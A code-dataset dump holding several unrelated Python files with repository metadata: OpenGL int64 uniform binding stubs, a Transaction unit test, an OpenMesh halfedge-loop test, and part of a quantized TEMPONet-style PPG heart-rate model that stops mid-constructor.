OpenGLCffi/GL/EXT/ARB/gpu_shader_int64.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
from OpenGLCffi.GL import params
@params(api='gl', prms=['location', 'x'])
def glUniform1i64ARB(location, x):
pass
@params(api='gl', prms=['location', 'x', 'y'])
def glUniform2i64ARB(location, x, y):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z'])
def glUniform3i64ARB(location, x, y, z):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z', 'w'])
def glUniform4i64ARB(location, x, y, z, w):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform1i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform2i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform3i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform4i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'x'])
def glUniform1ui64ARB(location, x):
pass
@params(api='gl', prms=['location', 'x', 'y'])
def glUniform2ui64ARB(location, x, y):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z'])
def glUniform3ui64ARB(location, x, y, z):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z', 'w'])
def glUniform4ui64ARB(location, x, y, z, w):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform1ui64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform2ui64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform3ui64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform4ui64vARB(location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'params'])
def glGetUniformi64vARB(program, location, params):
pass
@params(api='gl', prms=['program', 'location', 'params'])
def glGetUniformui64vARB(program, location, params):
pass
@params(api='gl', prms=['program', 'location', 'bufSize', 'params'])
def glGetnUniformi64vARB(program, location, bufSize, params):
pass
@params(api='gl', prms=['program', 'location', 'bufSize', 'params'])
def glGetnUniformui64vARB(program, location, bufSize, params):
pass
@params(api='gl', prms=['program', 'location', 'x'])
def glProgramUniform1i64ARB(program, location, x):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y'])
def glProgramUniform2i64ARB(program, location, x, y):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z'])
def glProgramUniform3i64ARB(program, location, x, y, z):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z', 'w'])
def glProgramUniform4i64ARB(program, location, x, y, z, w):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform1i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform2i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform3i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform4i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'x'])
def glProgramUniform1ui64ARB(program, location, x):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y'])
def glProgramUniform2ui64ARB(program, location, x, y):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z'])
def glProgramUniform3ui64ARB(program, location, x, y, z):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z', 'w'])
def glProgramUniform4ui64ARB(program, location, x, y, z, w):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform1ui64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform2ui64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform3ui64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform4ui64vARB(program, location, count, value):
pass
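Every binding above is a pass-through stub whose signature is described by the @params decorator. A minimal sketch of what such a metadata-recording decorator could look like (hypothetical; the real OpenGLCffi resolves these names against the native GL library via cffi):

def params(api, prms):
    def decorator(func):
        func.api = api    # API family the binding belongs to
        func.prms = prms  # declared parameter names, used when marshalling calls
        return func
    return decorator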
| 23.675824
| 68
| 0.670225
| 525
| 4,309
| 5.500952
| 0.102857
| 0.207756
| 0.137119
| 0.186981
| 0.735457
| 0.725416
| 0.725416
| 0.714681
| 0.714681
| 0.690097
| 0
| 0.027218
| 0.113251
| 4,309
| 181
| 69
| 23.80663
| 0.728605
| 0
| 0
| 0.66055
| 0
| 0
| 0.171349
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.330275
| false
| 0.330275
| 0.009174
| 0
| 0.33945
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8c92a3d220ed37c75a8865fe758dfc40f5b3afc2
| 2,134
|
py
|
Python
|
test_balance.py
|
AbedFayyad/balance
|
6aade43637dbcd7785f55df2965486a8da20b5df
|
[
"MIT"
] | 1
|
2015-11-05T16:39:07.000Z
|
2015-11-05T16:39:07.000Z
|
test_balance.py
|
AbedFayyad/balance
|
6aade43637dbcd7785f55df2965486a8da20b5df
|
[
"MIT"
] | null | null | null |
test_balance.py
|
AbedFayyad/balance
|
6aade43637dbcd7785f55df2965486a8da20b5df
|
[
"MIT"
] | null | null | null |
#!/Library/FrameWorks/Python.framework/Versions/3.5/bin/python3
from balance import TransactionManager
from balance import Transaction
import os
import unittest
class TestTransaction(unittest.TestCase):
def test_constructor_positive_simple(self):
t = Transaction(100, [])
self.assertEqual(t.is_negative, False)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 0)
def test_constructor_negative_simple(self):
t = Transaction(-100, [])
self.assertEqual(t.is_negative, True)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 0)
def test_constructor_positive_small(self):
t = Transaction(100.01, [])
self.assertEqual(t.is_negative, False)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 1)
def test_constructor_positive_big(self):
t = Transaction(100.99, [])
self.assertEqual(t.is_negative, False)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 99)
def test_constructor_negative_small(self):
t = Transaction(-100.99, [])
self.assertEqual(t.is_negative, True)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 99)
def test_constructor_negative_big(self):
t = Transaction(-100.01, [])
self.assertEqual(t.is_negative, True)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 1)
def test_string_positive_simple(self):
t = Transaction(100.01, [])
t.date = t.date.replace(1995, 12, 12)
self.assertEqual(str(t), "100.01 on 1995-12-12")
def test_string_negative_simple(self):
t = Transaction(-100.01, [])
t.date = t.date.replace(1995, 12, 12)
self.assertEqual(str(t), "-100.01 on 1995-12-12")
def test_string_complex(self):
t = Transaction(100, ["birthday", "toy"])
t.date = t.date.replace(1995, 12, 12)
self.assertEqual(str(t), "100.00 on 1995-12-12 #birthday #toy")
class TestTransactionManager(unittest.TestCase):
pass
if __name__ == "__main__":
unittest.main()
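The constructor tests above fully pin down how an amount is decomposed into sign, dollars, and cents. A sketch of a Transaction.__init__ consistent with them (hypothetical; per the string tests, the real balance module also tracks tags and a date):

def __init__(self, amount, tags):
    self.is_negative = amount < 0
    total_cents = round(abs(amount) * 100)   # avoids float artifacts like 100.01 * 100 == 10000.999...
    self.dollars, self.cents = divmod(total_cents, 100)
    self.tags = tags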
| 31.382353
| 71
| 0.653702
| 275
| 2,134
| 4.927273
| 0.203636
| 0.232472
| 0.212546
| 0.126199
| 0.739483
| 0.727675
| 0.704059
| 0.704059
| 0.704059
| 0.704059
| 0
| 0.078537
| 0.218369
| 2,134
| 67
| 72
| 31.850746
| 0.733813
| 0.029053
| 0
| 0.490196
| 0
| 0
| 0.045872
| 0
| 0
| 0
| 0
| 0
| 0.411765
| 1
| 0.176471
| false
| 0.019608
| 0.078431
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8cd54ba8341657fdad7b120f181721a0e4fa5e8e
| 4,334
|
py
|
Python
|
tests/test_trimesh_circulator_halfedge_loop.py
|
nmaxwell/OpenMesh-Python
|
daa461069decb459f990bfcc1131c55a2db7b5e5
|
[
"BSD-3-Clause"
] | 9
|
2019-09-16T10:03:37.000Z
|
2022-02-03T17:56:24.000Z
|
tests/test_trimesh_circulator_halfedge_loop.py
|
Jiawei1996/OpenMesh-Python
|
daa461069decb459f990bfcc1131c55a2db7b5e5
|
[
"BSD-3-Clause"
] | 2
|
2017-01-04T10:55:17.000Z
|
2017-01-16T16:59:34.000Z
|
tests/test_trimesh_circulator_halfedge_loop.py
|
jjennings955/openmesh-python-subdivide
|
7f39bd1693f009ddd8739c98671b122c4d4aba81
|
[
"BSD-3-Clause"
] | 1
|
2020-04-13T15:23:59.000Z
|
2020-04-13T15:23:59.000Z
|
import unittest
import openmesh
import numpy as np
class TrimeshCirculatorHalfedgeLoop(unittest.TestCase):
def setUp(self):
self.mesh = openmesh.TriMesh()
self.vhandle = []
def test_halfedge_loop_with_face(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(np.array([0, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([1, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([3, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([4, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, -1, 0])))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[5])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
# Test setup:
#
# edge x => halfedge x/x+1
# i.e. edge 0 => halfedge 0/1
#
# 0 --4--- 2 ------ 4
# \ / \ /
# 0 0 2 6 2 /
# \ / 1 \ /
# 1 ---8--- 3
# \ /
# \ 3 /
# \ /
# \ /
# 5
# Circle around face 1
hl_it = self.mesh.hl(self.mesh.halfedge_handle(3))
self.assertEqual(next(hl_it).idx(), 3)
self.assertEqual(next(hl_it).idx(), 6)
self.assertEqual(next(hl_it).idx(), 8)
with self.assertRaises(StopIteration):
next(hl_it)
def test_halfedge_loop_without_face(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(np.array([0, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([1, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([3, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([4, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, -1, 0])))
# Add three faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[5])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
# Test setup:
#
# H => hole (no face)
# fx => face #x
# edge 0 => halfedge 0/1
#
# 0 --4--- 2 -10--- 4
# \ / \ /
# 0 f0 2 6 f2 8
# \ / H \ /
# 1 ---16---3
# \ /
# 12 f3 14
# \ /
# \ /
# 5
# Circle around the hole
hl_it = self.mesh.hl(self.mesh.halfedge_handle(3))
self.assertEqual(next(hl_it).idx(), 3)
self.assertEqual(next(hl_it).idx(), 17)
self.assertEqual(next(hl_it).idx(), 7)
with self.assertRaises(StopIteration):
next(hl_it)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TrimeshCirculatorHalfedgeLoop)
unittest.TextTestRunner(verbosity=2).run(suite)
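Because hl() returns a plain iterator (the tests drive it with next() and expect StopIteration at the end), it can also be consumed with a comprehension, assuming the circulator implements __iter__ as openmesh-python circulators generally do; e.g., on the four-face mesh from test_halfedge_loop_with_face:

loop = [heh.idx() for heh in mesh.hl(mesh.halfedge_handle(3))]
assert loop == [3, 6, 8]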
| 31.867647
| 86
| 0.547993
| 534
| 4,334
| 4.294007
| 0.142322
| 0.183166
| 0.16485
| 0.201483
| 0.811601
| 0.811601
| 0.788923
| 0.753162
| 0.737462
| 0.737462
| 0
| 0.037609
| 0.312875
| 4,334
| 135
| 87
| 32.103704
| 0.732371
| 0.127596
| 0
| 0.774648
| 0
| 0
| 0.002138
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0.042254
| false
| 0
| 0.042254
| 0
| 0.098592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ce2dd68da3d50b98af2b33c46901c305845d73f
| 47,541
|
py
|
Python
|
precision_search/model/TimePPG_variants.py
|
EmbeddedML-EDAGroup/Q-PPG
|
ed42829d0a456db4f0b31d63ba8b22ba483c7b08
|
[
"Apache-2.0"
] | 1
|
2021-12-18T21:04:29.000Z
|
2021-12-18T21:04:29.000Z
|
precision_search/model/TimePPG_variants.py
|
EmbeddedML-EDAGroup/Q-PPG
|
ed42829d0a456db4f0b31d63ba8b22ba483c7b08
|
[
"Apache-2.0"
] | null | null | null |
precision_search/model/TimePPG_variants.py
|
EmbeddedML-EDAGroup/Q-PPG
|
ed42829d0a456db4f0b31d63ba8b22ba483c7b08
|
[
"Apache-2.0"
] | null | null | null |
#*----------------------------------------------------------------------------*
#* Copyright (C) 2021 Politecnico di Torino, Italy *
#* SPDX-License-Identifier: Apache-2.0 *
#* *
#* Licensed under the Apache License, Version 2.0 (the "License"); *
#* you may not use this file except in compliance with the License. *
#* You may obtain a copy of the License at *
#* *
#* http://www.apache.org/licenses/LICENSE-2.0 *
#* *
#* Unless required by applicable law or agreed to in writing, software *
#* distributed under the License is distributed on an "AS IS" BASIS, *
#* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *
#* See the License for the specific language governing permissions and *
#* limitations under the License. *
#* *
#* Author: Alessio Burrello *
#*----------------------------------------------------------------------------*
import torch.nn as nn
import torch.nn.functional as F
from base import BaseModel
from math import ceil
import sys
sys.path.append("..")
from models import quant_module_1d as qm
import json
import torch
__all__ = ['mixTimePPG_big_248_layers', 'mixTimePPG_big_248_multiprec', 'TimePPG_big_quantized_8', 'TimePPG_big_quantized_4', \
'TimePPG_big_quantized_2', 'TimePPG_big_quantized_big', 'TimePPG_big_quantized_medium', 'TimePPG_big_quantized_small', \
'mixTimePPG_medium_248_layers', 'mixTimePPG_medium_248_multiprec', 'TimePPG_medium_quantized_8', 'TimePPG_medium_quantized_4', \
'TimePPG_medium_quantized_2', 'TimePPG_medium_quantized_big', 'TimePPG_medium_quantized_medium', 'TimePPG_medium_quantized_small', \
'mixTimePPG_small_248_layers', 'mixTimePPG_small_248_multiprec', 'TimePPG_small_quantized_8', 'TimePPG_small_quantized_4', \
'TimePPG_small_quantized_2', 'TimePPG_small_quantized_big', 'TimePPG_small_quantized_medium', 'TimePPG_small_quantized_small', \
'TimePPG_big_multiprec_big', 'TimePPG_big_multiprec_medium', 'TimePPG_big_multiprec_small', \
'TimePPG_medium_multiprec_big', 'TimePPG_medium_multiprec_medium', 'TimePPG_medium_multiprec_small', \
'TimePPG_small_multiprec_big', 'TimePPG_small_multiprec_medium', 'TimePPG_small_multiprec_small', \
]
import numpy as np

def _load_multiprec_arch(json_file_path, tail_channels):
    """Shared loader for the searched multiprec architectures: expands the
    activation bit codes (0/1/2 -> 2/4/8, 32 stays 32) and counts, per layer,
    how many channels were assigned to each weight precision (2/4/8 bits)."""
    with open(json_file_path, 'r') as j:
        contents = json.loads(j.read())
    for i, val in enumerate(contents['best_activ']):
        if contents['best_activ'][i] != 32:
            contents['best_activ'][i] = 2 ** (val + 1)
    channels = []
    for val in contents['best_weight']:
        channels.append([sum(np.asarray(val) == 0),   # 2-bit channels
                         sum(np.asarray(val) == 1),   # 4-bit channels
                         sum(np.asarray(val) == 2)])  # 8-bit channels
    channels.extend(tail_channels)             # regressor widths
    contents['best_activ'].extend([8, 8, 8])   # regressors + output neuron
    return contents['best_activ'], channels

def _multiprec_model(json_file_path, tail_channels, **kwargs):
    abits, channels = _load_multiprec_arch(json_file_path, tail_channels)
    return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits=abits,
                                       wbits=[32] * 12, channels=channels, **kwargs)

def TimePPG_big_multiprec_big(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_big_248_multiprec3500.json', [82, 61], **kwargs)
def TimePPG_big_multiprec_medium(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_big_248_multiprec350.json', [82, 61], **kwargs)
def TimePPG_big_multiprec_small(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_big_248_multiprec35.json', [82, 61], **kwargs)
def TimePPG_medium_multiprec_big(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_medium_248_multiprec3500.json', [45, 80], **kwargs)
def TimePPG_medium_multiprec_medium(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_medium_248_multiprec350.json', [45, 80], **kwargs)
def TimePPG_medium_multiprec_small(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_medium_248_multiprec35.json', [45, 80], **kwargs)
def TimePPG_small_multiprec_big(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_small_248_multiprec3500.json', [28, 77], **kwargs)
def TimePPG_small_multiprec_medium(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_small_248_multiprec350.json', [28, 77], **kwargs)
def TimePPG_small_multiprec_small(**kwargs):
    return _multiprec_model('mix_archs/architecture_mixTimePPG_small_248_multiprec35.json', [28, 77], **kwargs)
def mixTimePPG_big_248_layers(**kwargs):
return TimePPG(qm.MixActivChanConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], share_weight=True, **kwargs)
def mixTimePPG_big_248_multiprec(**kwargs):
return TimePPG(qm.MultiPrecActivConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], share_weight=True, **kwargs)
def TimePPG_big_quantized_8(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,8,8,8], wbits = [8,8,8,8,8,8,8,8,8,8,8,8], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_4(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [4,4,4,4,4,4,4,4,4,4,4,4], wbits = [4,4,4,4,4,4,4,4,4,4,4,4], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_2(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [2,2,2,2,2,2,2,2,2,2,2,2], wbits = [2,2,2,2,2,2,2,2,2,2,2,2], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_big(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,32,32,32], wbits = [8,8,4,8,8,8,8,4,8,32,32,32], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_medium(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,4,4,4,4,4,4,8,32,32,32], wbits = [8,4,4,4,4,4,4,2,2,32,32,32], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_small(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,4,4,4,4,4,4,2,4,32,32,32], wbits = [4,2,2,2,2,2,2,2,2,32,32,32], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def mixTimePPG_medium_248_layers(**kwargs):
return TimePPG(qm.MixActivChanConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], share_weight=True, **kwargs)
def mixTimePPG_medium_248_multiprec(**kwargs):
return TimePPG(qm.MultiPrecActivConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], share_weight=True, **kwargs)
def TimePPG_medium_quantized_8(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,8,8,8], wbits = [8,8,8,8,8,8,8,8,8,8,8,8], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_4(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [4,4,4,4,4,4,4,4,4,4,4,4], wbits = [4,4,4,4,4,4,4,4,4,4,4,4], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_2(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [2,2,2,2,2,2,2,2,2,2,2,2], wbits = [2,2,2,2,2,2,2,2,2,2,2,2], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_big(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,32,32,32], wbits = [8,8,4,8,8,8,8,4,8,32,32,32], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_medium(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,4,4,4,4,4,4,8,32,32,32], wbits = [8,4,4,4,4,4,4,2,2,32,32,32], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_small(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,4,4,4,4,4,4,2,4,32,32,32], wbits = [4,2,2,2,2,2,2,2,2,32,32,32], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def mixTimePPG_small_248_layers(**kwargs):
return TimePPG(qm.MixActivChanConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], share_weight=True, **kwargs)
def mixTimePPG_small_248_multiprec(**kwargs):
return TimePPG(qm.MultiPrecActivConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], share_weight=True, **kwargs)
def TimePPG_small_quantized_8(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,8,8,8], wbits = [8,8,8,8,8,8,8,8,8,8,8,8], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_4(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [4,4,4,4,4,4,4,4,4,4,4,4], wbits = [4,4,4,4,4,4,4,4,4,4,4,4], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_2(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [2,2,2,2,2,2,2,2,2,2,2,2], wbits = [2,2,2,2,2,2,2,2,2,2,2,2], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_big(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,32,32,32], wbits = [8,8,4,8,8,8,8,4,8,32,32,32], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_medium(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,4,4,4,4,4,4,8,32,32,32], wbits = [8,4,4,4,4,4,4,2,2,32,32,32], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_small(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,4,4,4,4,4,4,2,4,32,32,32], wbits = [4,2,2,2,2,2,2,2,2,32,32,32], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
class TimePPG_quantized_multiprec(BaseModel):
"""
TEMPONet architecture:
Three repeated instances of TemporalConvBlock and ConvBlock organized as follows:
- TemporalConvBlock
- ConvBlock
Two instances of Regressor followed by a final Linear layer with a single neuron.
"""
def __init__(self, conv, wbits, abits, channels = 'Not Initialized', share_weight = True, dataset_name='PPG_Dalia', dataset_args={}):
super(TimePPG_quantized_multiprec, self).__init__()
self.conv_func = conv
self.dil = [2, 2, 1, 4, 4, 8, 8]
        self.rf = [5, 5, 5, 9, 9, 17, 17]
if isinstance(channels, list):
self.ch = channels
else:
            print('Missing channels configuration for TimePPG')
            sys.exit(1)  # configuration error, so exit with a non-zero status
# 1st instance of two TempConvBlocks and ConvBlock
k_tcb00 = ceil(self.rf[0] / self.dil[0])
self.tcb00 = TempConvBlock_multiprec(conv,
ch_in=4,
ch_out=self.ch[0],
k_size=k_tcb00,
dil=self.dil[0],
pad=((k_tcb00 - 1) * self.dil[0] + 1) // 2,
wbits=wbits[0],
abits=abits[0],
share_weight=share_weight,
first_layer = True
)
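        # Padding note: pad = ((k - 1) * dil + 1) // 2 is "same" padding for a
        # dilated kernel. E.g. rf = 5, dil = 2 gives k = ceil(5 / 2) = 3, an
        # effective kernel extent of (3 - 1) * 2 + 1 = 5, and pad = 5 // 2 = 2,
        # so a stride-1 dilated convolution preserves the sequence length.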
k_tcb01 = ceil(self.rf[1] / self.dil[1])
self.tcb01 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[0]),
ch_out=self.ch[1],
k_size=k_tcb01,
dil=self.dil[1],
pad=((k_tcb01 - 1) * self.dil[1] + 1) // 2,
wbits=wbits[1],
abits=abits[1],
share_weight=share_weight
)
k_cb0 = ceil(self.rf[2] / self.dil[2])
self.cb0 = ConvBlock_multiprec(conv,
ch_in=sum(self.ch[1]),
ch_out=self.ch[2],
k_size=k_cb0,
strd=1,
pad=((k_cb0 - 1) * self.dil[2] + 1) // 2,
dilation=self.dil[2],
wbits=wbits[2],
abits=abits[2],
share_weight=share_weight
)
# 2nd instance of two TempConvBlocks and ConvBlock
k_tcb10 = ceil(self.rf[3] / self.dil[3])
self.tcb10 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[2]),
ch_out=self.ch[3],
k_size=k_tcb10,
dil=self.dil[3],
pad=((k_tcb10 - 1) * self.dil[3] + 1) // 2,
wbits=wbits[3],
abits=abits[3],
share_weight=share_weight
)
k_tcb11 = ceil(self.rf[4] / self.dil[4])
self.tcb11 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[3]),
ch_out=self.ch[4],
k_size=k_tcb11,
dil=self.dil[4],
pad=((k_tcb11 - 1) * self.dil[4] + 1) // 2,
wbits=wbits[4],
abits=abits[4],
share_weight=share_weight
)
self.cb1 = ConvBlock_multiprec(conv,
ch_in=sum(self.ch[4]),
ch_out=self.ch[5],
k_size=5,
strd=2,
pad=2,
wbits=wbits[5],
abits=abits[5],
share_weight=share_weight
)
        # 3rd instance of TempConvBlock and ConvBlock
k_tcb20 = ceil(self.rf[5] / self.dil[5])
self.tcb20 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[5]),
ch_out=self.ch[6],
k_size=k_tcb20,
dil=self.dil[5],
pad=((k_tcb20 - 1) * self.dil[5] + 1) // 2,
wbits=wbits[6],
abits=abits[6],
share_weight=share_weight
)
k_tcb21 = ceil(self.rf[6] / self.dil[6])
self.tcb21 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[6]),
ch_out=self.ch[7],
k_size=k_tcb21,
dil=self.dil[6],
pad=((k_tcb21 - 1) * self.dil[6] + 1) // 2,
wbits=wbits[7],
abits=abits[7],
share_weight=share_weight
)
self.cb2 = ConvBlock_multiprec(conv,
ch_in=sum(self.ch[7]),
ch_out=self.ch[8],
k_size=5,
strd=4,
pad=4,
